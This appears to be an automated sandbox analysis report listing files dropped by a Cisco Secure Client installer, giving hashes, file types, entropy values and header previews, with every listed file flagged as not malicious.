                                                                                                                                      SSDEEP:6144:0IPmqpO6R1WKsOcYY0HUxBufpzBJJJ8mdjIIIIX1Emy9uQ1jjj6eSPfp:DPN4g1oOcc0xGO6hlvPh
                                                                                                                                      MD5:0B1C614353D5012752C02F5425C1B0DD
                                                                                                                                      SHA1:1197BA2379472A303187FEA328EF79F5C6B66E46
                                                                                                                                      SHA-256:804B953D07F40A09958547947D871B06DE54D34774CA13671AF583C24114D8A2
                                                                                                                                      SHA-512:280C219212850D9EAD379D7F8223003F1DF1B180BCC27334BC2FBA27232312CA135212AA8E902B912F3265156B210017087A9D698028AF26E529E17D053425E0
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9:.3}[.`}[.`}[.`t#x`s[.`/..a.[.`/..aq[.`/..aw[.`/..ax[.`i0.a{[.`(..a~[.`}[.`.[.`}[.`p[.`(..a.[.`(..a|[.`(..a|[.`Rich}[.`................PE..L.....Od...........!................ ........................................P............@A............................x...X...........................hH... ...#......T...............................@............................................text....}.......~.................. ..`fipstx...n.......p.................. ..`.rdata...(.......*..................@..@.data........0......................@...fipsro..`]...P...^... ..............@..@fipsda...............~..............@...fsig................................@..@fipsrd...M.......N..................@..@.reloc...#... ...$..................@..B................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3SJAC.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Windows setup INFormation
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1898
                                                                                                                                      Entropy (8bit):5.184476593945747
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1Bgd0zK3NIhE1bnJrGfiuzLOAYCuh35oD8d7/16U8LUFb:1Bgd0zK3NIhEpnJrGftzLO0kpoD8d7UM
                                                                                                                                      MD5:CCB4651BFC7878E5AC78F2D63955A21B
                                                                                                                                      SHA1:315E8C89BA48B0B788AC90D2FFEA97A6C0C2AF94
                                                                                                                                      SHA-256:F4427B5BAE243EED40F2B448C3137F74753E135CD001D860A7DCAB208C929217
                                                                                                                                      SHA-512:BBAF097D051F0E27EB252A639046202430F84DD1DFB30BB35E4F58A0BD24850C61957A4799E04A2A1705FC62E829CC594CB87073FDE16D47C09E216077566925
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:;;; acsock64.inf..;;;..;;; Cisco Secure Client Kernel Driver Framework Socket Layer Interceptor..;;;..;;; Copyright (c) 2004-2021 Cisco Systems, Inc. ..;;;..;;; Abstract:..;;; Callout sample driver install configuration...;;;....[Version]..signature = "$Windows NT$"..Provider = %Cisco%..DriverVer = 06/14/2023,5.0.04021.0..Class = CiscoNetworkFilter..ClassGuid = {729021b6-d014-47b0-8a6a-d2c45f77af4f} ..CatalogFile = acsock64.cat....[SourceDisksNames]..1 = %DiskId1%,,,....[SourceDisksFiles.amd64]..acsock64.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..Inspect.DriverFiles = 12 ;%windir%\system32\drivers....;..; Copy Files..;....[Inspect.DriverFiles]..acsock64.sys,,,0x00000004 ; COPYFLG_NOVERSIONCHECK....;;..;; Default install sections..;;....[DefaultInstall.ntamd64]..OptionDesc = %InspectServiceDesc%..CopyFiles = Inspect.DriverFiles....[DefaultInstall.ntamd64.Services]..AddService = %InspectServiceName%,,Inspect.Service.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3VFI6.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):286824
                                                                                                                                      Entropy (8bit):6.617095335993768
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:tnTXBb1av9tRiTYNC2s2jSPah5WQXR+1XAOtMFK:Lcv9tRiUNLV+1XHf
                                                                                                                                      MD5:A46C978EB55D64043AAC769320503C12
                                                                                                                                      SHA1:60AD2BB287B1E6F768EA873B1390ACA13A853999
                                                                                                                                      SHA-256:19E4270B838CBC3054175427E9C5DA3BBACD92A0E69ECE036C490FC3F13302B1
                                                                                                                                      SHA-512:DFD94979A6AD9AF454C40324A42FD83CB0F14E2EEFEBF81810DEB5A4A24E0EA3B6466E0D28E32BBC0192D732B9D6B2429843E22F7E07F42D2EBE5835A3E47ACE
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5I.Rq(..q(..q(..eC..|(..eC...(..eC..g(..#]..~(..#]..e(..#]..&(..eC..p(..eC..|(..q(...(...]..}(...]..p(...]u.p(..q(..p(...]..p(..Richq(..................PE..L...c..d...........!.........~...............................................`............@.........................P...........x.... ..................hH...0..,(..t...p..............................@............... ............................text............................... ..`.rdata..*#.......$..................@..@.data...d'..........................@....rsrc........ ......................@..@.reloc..,(...0...*..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-50H6H.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):912488
                                                                                                                                      Entropy (8bit):6.783823890055007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:hzaSwCkln20SXQK4RjiqKSehi15NeM1+uFTXqNK+FrZeqQFXpB:h+SwCkl20VLipi15NeM1+oTorjoB
                                                                                                                                      MD5:2DAB87822AC2A484AC9D28D9BEEA60DC
                                                                                                                                      SHA1:F49F17CD267325EDC70651940E3322E602ECBF63
                                                                                                                                      SHA-256:88549D168B1062176C09C20A6A264432792A9C3DD291EBB34DDAA16E0C822CCA
                                                                                                                                      SHA-512:AB8F79AD1AF50D1537E288D5A1E36D65A2463C5F77113E02770DE85BA7058C6054EDC82165D14A061D151CA40D5128C88B9D314635E540D3439B2D8B407ABD42
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........]U...U...U...\...A......_...3.m.Q......._.......^.......J.......Q......J.......Q...A..D...U...[.......w.......T.....o.T...U...T.......T...RichU...........PE..L......d...........!.....V...T...............p............................................@A........................P....y..`z....... ..P...............hH...0.......O..p....................Q......0P..@............p...............................text...zU.......V.................. ..`.rdata..@G...p...H...Z..............@..@.data...._.......V..................@....rsrc...P.... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-53P9C.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1865320
                                                                                                                                      Entropy (8bit):6.970258455602142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:cN4UkzzVwcS5/h2m7tPpbO8in1CPwDv3uFbvYdkYuj:cNb/h26XbO8K1CPwDv3uFbv3
                                                                                                                                      MD5:401E2AAFE861E1BBCC04EEED82868DBF
                                                                                                                                      SHA1:D4ADD73521989319137E731485CE64DC370AAFE6
                                                                                                                                      SHA-256:09EF0662458A6B07BC5B063576981CACF74E7E7B3FD355FF6EF49395A8D95183
                                                                                                                                      SHA-512:891731F36B327E2B33AC31C39E869D8FE4CB4A7B289F3183857A0671C5DACA700552A5EAF29A07AC537330B57A0C45DC27DDE8AA5B7AC33C9F8A6F8E9B1EE968
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........],.<B..<B..<B..D..<B..IC..<B..IG..<B..IF..<B..IA..<B..WC..<B..<C.'<B..<B..<B..IF..>B..IB..<B..I...<B..I@..<B.Rich.<B.........................PE..L.....Od...........!......................................................................@A........................@^......XH..T.......................hH......|....Y..T...........................`Y..@............................................text...8........................... ..`.rdata..bf.......h..................@..@.data....N...`.......H..............@....rsrc................^..............@..@.reloc..|............d..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-5J2U6.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):45672
                                                                                                                                      Entropy (8bit):6.909278775883234
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kD0B4emSfS7QU1+oZYDGV5ENAMxfwDGV/vUAMxkEr:ce8+oixfRKx/
                                                                                                                                      MD5:F9E23973D3BF6B1A6ECAD723B07FDDD1
                                                                                                                                      SHA1:958C2BBF7D86C8B4527DA5082A4BA3428465031D
                                                                                                                                      SHA-256:9990F20DAA97C9502D6E056EE81E2B8815AF9DAF52A2E22B95A3CCB00C6BA332
                                                                                                                                      SHA-512:48A36927B69443DE27EEE9FFF3D84E06DB6BB050B62A4CE2AC3014362B7BA119648294578545FA48BC95D497FAE1D99D010AA5A1AD78E9C8F15D09F427CE66E5
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f...f...f...o...n.....~.d...4.z.v...4.{.l...4.|.c...4.~.b.....~.e...f.~.U.....z.e.......g.....}.g...Richf...................PE..L.....^...........!.....4...2.......3.......P............................................@.........................._.......o.......................j..hH..........PS..............................pS..@............P...............................text...K2.......4.................. ..`.rdata...%...P...&...8..............@..@.data...|............^..............@....rsrc................b..............@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-7ITNQ.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1657960
                                                                                                                                      Entropy (8bit):6.613955270280212
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:NEFJgRL9dvWmJhDQLTE/SBL2M9MvGOBU+X3OKxfO3XqWjgVIOJCTR:aYRLPHhD/G2M9Mtv3OKxGBjgVIOJCTR
                                                                                                                                      MD5:EB82DFAB501EA2CE256AABDF7EFA443F
                                                                                                                                      SHA1:1656FC8BE6B149399EF99EFBDF859E2BC6657525
                                                                                                                                      SHA-256:A9627BE9ABED41D166C8AAC6E77BF33DCCB97A03D5ED80E30D389CFDD146D608
                                                                                                                                      SHA-512:F9979AF7B289635ABE58DB8D30E5594362AEAB86C34C4825ED8A10DEAE28F63F7EAD6D042B7D65A246A7A444E8E06A15D679ABE34FC313F3BCE70A621F0A154C
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......oE.+$..+$..+$.."\'.9$..MKI.)$..yQ..!$..yQ...$..yQ../$..yQ..4$...Q../$..?O../$..M..)$..~Q../$..?O..:$..+$..1!...Q..o$...Q..*$...QK.*$..+$#.*$...Q..*$..Rich+$..........................PE..L......d...........!.........................@...............................@............@A.........................|..@...@l.......P..X...............hH.......:......T...................@.......`...@............@..d............................text...z........................... ..`.orpc...J....0...................... ..`.rdata...y...@...z... ..............@..@.data...............................@....rsrc...X....P......................@..@.reloc...:.......<..................@..B........................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8761D.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):745576
                                                                                                                                      Entropy (8bit):6.225379685413281
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:Qx5TysIG9cavT2FWgBKkuD/wQoJ4GMJzu:cxIGKavT2FWz/wQffzu
                                                                                                                                      MD5:DB9F087F33F5375F0883F4E29F81074C
                                                                                                                                      SHA1:1D9715CDFA425F4F6FA14D80233B9ECE8F9AA89E
                                                                                                                                      SHA-256:5D27CE634581F9CEE12C17D9F4AD6AB1B7C6BCDBB911618E7416D2FB4F1981F0
                                                                                                                                      SHA-512:A740845C79909898881742BA552F8358EE35EA33077A41EA2F9BC4FA824923956AFB1AB3D7870FEE626110BB51FC347AC3D04A2D84747D99EA98B1F3E9FB98C0
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\.h3.m.`.m.`.m.`...a.m.`...a.m.`...a.m.`J..a.m.`J..a.m.`J..aJm.`...a.m.`.m.`.m.`...a.m.`...`.m.`.m.`.m.`...a.m.`Rich.m.`........................PE..d......d.........."......V.......... ..........@..........................................`.....................................................x....0..P........8......hH...@...5......T.......................(......8............p...............................text....T.......V.................. ..`.rdata...%...p...&...Z..............@..@.data....2..........................@....pdata...8.......:..................@..@_RDATA....... ......................@..@.rsrc...P....0......................@..@.reloc...5...@...6..................@..B........................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8CQPA.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Windows setup INFormation
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3233
                                                                                                                                      Entropy (8bit):5.341509881686345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:wYNZ3JpdhH+0dhH2EnEqZUmogaRvmL3dZMdr:wYH3JpdhH+0dhH/EqZUmoP+dZMdr
                                                                                                                                      MD5:0187FF566D704C12A49E4FBCE5E00C45
                                                                                                                                      SHA1:84BB1CECDD38FD203D2EE9691902C3FCCBDED366
                                                                                                                                      SHA-256:9EFBDCAD9BCD5A9B81AEA9B4643AD13799844117D8F41AA86882F808603037A2
                                                                                                                                      SHA-512:5C69EED3D00807A5ED8CB17981B23B50A4152E9044883DBB875011709C359CED146A83F740F0158E05C9C7ECE9AC52F5F9B15DE6128EE352A2424A7639708426
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:; vpnva-6.inf..;..; Cisco AnyConnect Virtual Miniport Adapter for Windows Setup File..;..; (c) Copyright 2004-2021 Cisco Systems, Inc.....[version]..Signature = "$Windows NT$"..Class = Net..ClassGUID = {4d36e972-e325-11ce-bfc1-08002be10318}..Provider = %Cisco%..CatalogFile = vpnva-6.cat..DriverVer = 12/14/2021,4.10.05040.0....[Manufacturer]..%CISCO%..= Cisco, NTamd64....[ControlFlags]..ExcludeFromSelect = *....[Cisco]..%vpnva.DeviceDesc% = Cisco.ndi.NTx86, vpnva....[Cisco.NTamd64]..%vpnva.DeviceDesc64% = Cisco.ndi.NTamd64, vpnva....[Cisco.ndi.NTx86]..Characteristics = 0x01 ; NCF_VIRTUAL..;BusType not required because this is not NCF_PHYSICAL..*IfType = 6 ; IF_TYPE_ETHERNET_CSMACD..*MediaType = 0 ; NdisMedium802_3..*PhysicalMediaType = 0 ; NdisPhysicalMediumUnspecified..AddReg...= Cisco.reg..CopyFiles..= Cisco.CopyFiles....[Cisco.ndi.NTamd64]..Characteristics = 0x01 ; NCF_VIRTUAL..;BusType not required because this is not NC

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-91CSN.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):145512
                                                                                                                                      Entropy (8bit):6.622600549799495
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:2lE8KKdwsPSfyPQ2TbpoEcRj+SOXzPsdGTE55vt67Ktb1sK8W77tHbloNeITqx/4:2q82KP9TbpoEI+Ew7Ktb1sKXblmeIkO
                                                                                                                                      MD5:E6FF7D48757F7470A8861AC3B3E159E6
                                                                                                                                      SHA1:3B2ED33F1025FB320D3C7D5699A941D94BBDC222
                                                                                                                                      SHA-256:74D0A04DED5E21F85BF32274823894AA5ACB9DDABE3D845F896E47521DEC2FE6
                                                                                                                                      SHA-512:312D1EDA0FAA80EC22AAD2CB660D611C1EE0207DCE84AB3A318B89CC7229993C518DDCE8B72D55A10FD85E392665394FAFEC6A320EFA84213A02360B49F8B1E1
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.}.=.......!.......).......).......1.......)...9...(...-...H...............,...-.y.,.......,...Rich-...........PE..L......d............................ ........0....@..........................@.......d....@.................................0...,.......................hH... .......c..T...................@e......Pd..@............0...............................text............................... ..`.rdata......0......................@..@.data... +..........................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-970AL.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):525928
                                                                                                                                      Entropy (8bit):6.663689707982956
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:8zNdH+68U6BXsQex0xCC5pQEhRL/21VVirhVVVPlLIOqyRcCGlhl48MBAuh:WNxQBXsQ0K5pXPLeriPlLIOqpdvlo
                                                                                                                                      MD5:4CE708F0420389B058B7F2D74561A2C3
                                                                                                                                      SHA1:9ABCCDEB744DFFD374DF72117CC47C7D18EEF506
                                                                                                                                      SHA-256:382B6CD7055A36DECCAD2839EC47BFD49B1C4077EE5DFC9CB07C829A4CAAABBE
                                                                                                                                      SHA-512:53A0BC22C6772CB46DBB1CBE6BE2079AB620845CD0CB49FB4AFE7D8DC861D38351A4CE7226ADCCE70180F65AB112701F55F91AA438B018D6C370A4244FB943ED
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............f]..f]..f]...]..f]..]..f].b\..f].e\..f].g\..f].c\..f]p.g\..f].g\..f]..g\..f]..g]~.f]p.o\..f]p.f\..f]p..]..f]...]..f]p.d\..f]Rich..f]................PE..L......d...........!.........@......................................................N.....@A............................0............@...B..............hH......._...u..T...................@v......`u..@............................................text............................... ..`.rdata..............................@..@.data........ ......................@....rsrc....B...@...D..................@..@.reloc..._.......`...^..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-98QQL.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):491624
                                                                                                                                      Entropy (8bit):6.495709095629098
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:8UBgEIe9ncUGQljr+1x87dfK8k9rqXsPNcJESSFCejFp:rFyUIP8Hk9rpcJEmev
                                                                                                                                      MD5:CE72AE5437229CC4EAB1FCE6C2B10555
                                                                                                                                      SHA1:46177D24E1CC592FB31F3B9A88F7A4CCF5B4D742
                                                                                                                                      SHA-256:24C42AD6CC70A169AFE6232E87E94BB4DC7ADC64A1C58A2A7565D28171E1AED0
                                                                                                                                      SHA-512:282751765E46AC037E13E4FA0DFC34ECF8D5FD08B7358775E55F44D91B4267A38B3345095C180DDDCCBADFD6645D05744F1E3109BAF84678125A51D6DE6A1955
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*U.K;..K;..K;..3...K;..>?..K;..>8..K;..>:..K;..>>..K;.n>:..K;.. :..K;..>:..K;..K:..J;.n>2..K;.n>..K;..K...K;.n>9..K;.Rich.K;.........................PE..L...B..d............................`.............@.................................n9....@.................................H...T....................8..hH... ...W..x...T...............................@............................................text............................... ..`.rdata...$.......&..................@..@.data....5.......&..................@....rsrc...............................@..@.reloc...W... ...X..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-BRMT9.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11144
                                                                                                                                      Entropy (8bit):7.2926694421063205
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:RCFWAyKfdF3Ee2yKO3FWQFBacRSp0X01k9z3AJEx0ALqf:kTb3FR+cR00R9zoE6A+f
                                                                                                                                      MD5:606BE87B926A7967C1B822260307544F
                                                                                                                                      SHA1:256B68497E3C942D5545A73FEF4AB4575D4A6BEE
                                                                                                                                      SHA-256:8B8A4129AD0745ABE9C05BBC36C3C4F97B85C97ECADFC884B6FFBDB5CCEA7B33
                                                                                                                                      SHA-512:4FBD62B00CD6D5948ACB32FA2250A44C6B6370CAA4CCD9FD5BDCC0FB7B9FA746BF8F1F03C6A7870F815037CAC47D737EAF1A7A77A48D74358D054321BB3B5690
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:0.+...*.H........+u0.+q...1.0...`.H.e......0..#..+.....7......0...0...+.....7........i;..A...ag....230706005513Z0...+.....7.....0..X0....1^...H...........1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...i.n.f...0.... ..z.G_#.(....E;...[I...Qh...N1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..z.G_#.(....E;...[I...Qh...N0......p.k,...a.B.>.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...s.y.s...0.... .B{[.$>.@.H...tu>.\...`.. ....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .B{[.$>.@.H...tu>.\...`.. .......q0..m0J.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D0HIO.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):89192
                                                                                                                                      Entropy (8bit):7.008180217438666
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:YWM3/1/n8silQ0Fu/ILuhcWnToIfJ9IOlIOOCxf8z5xP9YFxKQ:Je/8hWiuwLuhPTBfJ3vOCxf8JvQ
                                                                                                                                      MD5:DDD6A5364B689408B502CA21276645E1
                                                                                                                                      SHA1:B9B7643A8ADC0C1C0170DEB4834079572A0EC8D5
                                                                                                                                      SHA-256:6613A22498BD14CD46AC678F7B50675A084CA04FA923FE8F6D731C1CB703C324
                                                                                                                                      SHA-512:26661FD5918F6FDBA5C08C260534E484DC1D79A45E4797E64482B7B2E2CA8EBA1B6427984CF6072C08D5A88A3CA154F7DD1DAE73E91CB5A1D80B85B9B3DE10AC
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m...)...)...)... .!.#...{..*...O.O.-...{.."...{..#...{..(...=...+...)..........&......(.....M.(...).%.(......(...Rich)...................PE..L......d...........!.........b...............................................P......2q....@A........................@...`............0..X...............hH...@......T...T...............................@............................................text...f........................... ..`.rdata..nQ.......R..................@..@.data........ ......................@....rsrc...X....0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D2T5K.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):166264
                                                                                                                                      Entropy (8bit):6.800892494270331
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:UZqJu0h1iCPZYtIzss2wizpHB7RoSxvQ02bnt56CY2G1zVSdqXCvjC:UZqU0hStIzrQqht567ZSY+jC
                                                                                                                                      MD5:06DEEA1786C951D3CC7E24A3E714FF03
                                                                                                                                      SHA1:9906803CEDB8600C5E201AE080155BEEBD2902B2
                                                                                                                                      SHA-256:EAC4C95CD7B013E110F2CF28C08342126FE1658EF16010541F05B234D23272DD
                                                                                                                                      SHA-512:28CAA59DEEC92E417468BB0244DA2E60FAF6482EF608258E99FA47F59D3CD0EDEE69155E913034AC7B5E1AFC88DBF8F6F97058B75F0CBC6E4C045E1EE6EAADA0
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%>..a_a.a_a.a_a../`.c_a.h'.m_a.3*e.j_a.3*b.c_a.a_`.._a.3*`.d_a.3*d.r_a.3*a.`_a.3*..`_a.3*c.`_a.Richa_a.................PE..L...J|.a.........."!.....*...<......0........@......................................:.....@A.........................3..@....Q.......`...............f..x#...p..X....\..8............................\..@............P...............................text....).......*.................. ..`.data...(....@......................@....idata..`....P.......6..............@..@.rsrc........`.......D..............@..@.reloc..X....p.......H..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-EPD88.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):556
                                                                                                                                      Entropy (8bit):4.645067217480077
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:VKYMF1IXH5EkqfXMF1ITOLKvXwCPijecTygdLe3f8ytWHtO+PGb:iF1a6AF1owBlPkNtWNa
                                                                                                                                      MD5:A54C8C0CFD88CFE16115DCFF322A637A
                                                                                                                                      SHA1:DFD99A331FE511542CEE60731DE1F603AB11C3AD
                                                                                                                                      SHA-256:50695A74F95C74DE1888A94F9BB0DC19E0237500DDD2352D56E4A17F30324AF5
                                                                                                                                      SHA-512:BDB7E36EBE6F0A9A1F2662C89B4F253A7F354C7A5F2596EE3C52247CA25AF9A6F14B75D432B68DFACFB3611533A0E88648D5F7F3E72099AAFCA4BFA833029AAD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html>.. <head>.. <title>Open Source Used In Cisco AnyConnect Secure Mobility Client</title>.. </head>.. <body>.. <h1>Open Source Used In Cisco AnyConnect Secure Mobility Client</h1>.. <br/>.. <h3>Please refer to <a href="https://www.cisco.com/go/opensource">Open Source in Cisco Products</a> for the latest information on the open source used in Cisco AnyConnect Secure Mobility Client.</h3>.. <br/>.. <p><font size="2">&copy;2023 Cisco Systems, Inc. All rights reserved.</font></p>.. </body>..</html>

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-EUMLH.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
